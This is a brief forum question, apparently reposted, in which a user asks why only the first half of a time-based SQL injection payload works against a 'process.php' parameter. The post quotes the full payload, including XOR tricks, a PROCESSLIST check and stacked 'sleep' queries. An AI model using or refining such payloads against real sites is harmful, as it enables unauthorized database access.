• caglararli@hotmail.com
  • 05386281520

Why this SQLi query doesn’t work?

Çağlar Arlı      -    12 Views

Why this SQLi query doesn’t work?

I want to get stacked-queries injection here, but only the first part of my query is works (i got 10 sec delay). The second part of the request (with 30 sec delay) does not work. Why?

process.php?in=1"XOR(if((SELECT count(*) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE id=connection_id() AND info like 'insert%')=1,sleep(10),0))XOR"; select sleep(30);--